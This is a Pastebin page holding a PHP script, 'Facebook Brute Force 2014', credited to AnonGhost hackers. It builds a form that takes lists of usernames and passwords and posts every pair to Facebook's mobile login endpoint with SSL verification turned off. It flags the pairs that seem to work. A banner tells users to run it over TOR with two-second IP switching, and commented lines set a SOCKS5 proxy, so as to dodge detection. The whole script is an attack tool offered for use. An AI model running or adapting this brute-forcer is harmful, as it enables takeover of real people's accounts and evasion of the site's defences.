Advertisement
Sup3rpacm4n-Ibarra

Facebook Brute Force 2014

Feb 14th, 2017
459
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.98 KB | None | 0 0
  1. <?php
  2. ob_start();
  3. @set_time_limit(0);
  4. #################################################
  5. #---------------------------------------------- #
  6. # Facebook Brute Force 2014                     #
  7. #Coded by : Mauritania Attacker&Noname-Haxor    #
  8. #Greetz : All AnonGhost Members                 #
  9. #.... http://seclist.us/                        #
  10. # --------------------------------------------- #
  11. #################################################
  12.  
  13. echo "
  14. <head>
  15. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  16. <form method='POST'>
  17. <title>Facebook Brute Force 2014</title>
  18. </head>
  19. <style>
  20. textarea {
  21.     resize:none;
  22.     color: #1975FF ;
  23.     border:1px solid #1975FF ;
  24.     border-left: 4px solid #1975FF ;
  25. }
  26. input {
  27.     color: ##33CCFF;
  28.     border:1px dotted #33CCFF;
  29. }
  30. </style>";
  31.  
  32. echo "
  33. <body text='#FFFFFF' background='http://i.imgur.com/yMmSxgU.jpg'>
  34. <center><img src='http://i.imgur.com/Vl2suSf.gif'></center>
  35. <center>Don't use this script without TOR BROWSER + TOR SWITCHER (set up the interval seconds from TOR SWITCHER TO 2 SECONDS)</center>
  36. <p dir='ltr' align='center'>
  37. <textarea cols='22' class='area'  rows='14' name='username'></textarea>
  38. <textarea cols='22' class='area'  rows='14' name='password'></textarea><br>
  39. <br>
  40. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  41. if(isset($_POST['scan'])){
  42. #To Put Proxy SOCKS V5
  43. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");          
  44. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  45. function brute($user,$pass){
  46.     $ch = curl_init();      
  47.     curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  48.     curl_setopt($ch, CURLOPT_HEADER, 0);
  49.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  50.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  51.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  52.     curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  53.     curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  54.     $login = curl_exec($ch);
  55.     //print_r($login);
  56.     $check = (eregi('class="s t i u"',$login)) ? true:false;
  57.     if($check == true){
  58.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :(  || Username : <font color='red'>$user</font>&nbsp;  Password : <font color='red'>$pass</font></font></p>";
  59.     }else{
  60.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  61.     }
  62. }            
  63.  
  64.  
  65.  
  66.    
  67.     $username = explode("\n", $_POST['username']);
  68.     $password = explode("\n", $_POST['password']);
  69.    
  70.    
  71. foreach($username as $users) {
  72.     $users = @trim($users);
  73.     foreach($password as $pass) {
  74.         $pass = @trim($pass);
  75.         echo brute($users,$pass);
  76.     }
  77.  
  78. }
  79.  
  80. }
  81. echo"<br>
  82. <br>
  83. <br>
  84. <br>
  85. <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded by: Mauritania Attacker&Noname-Hax0r</font></b></p></center>";
  86. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement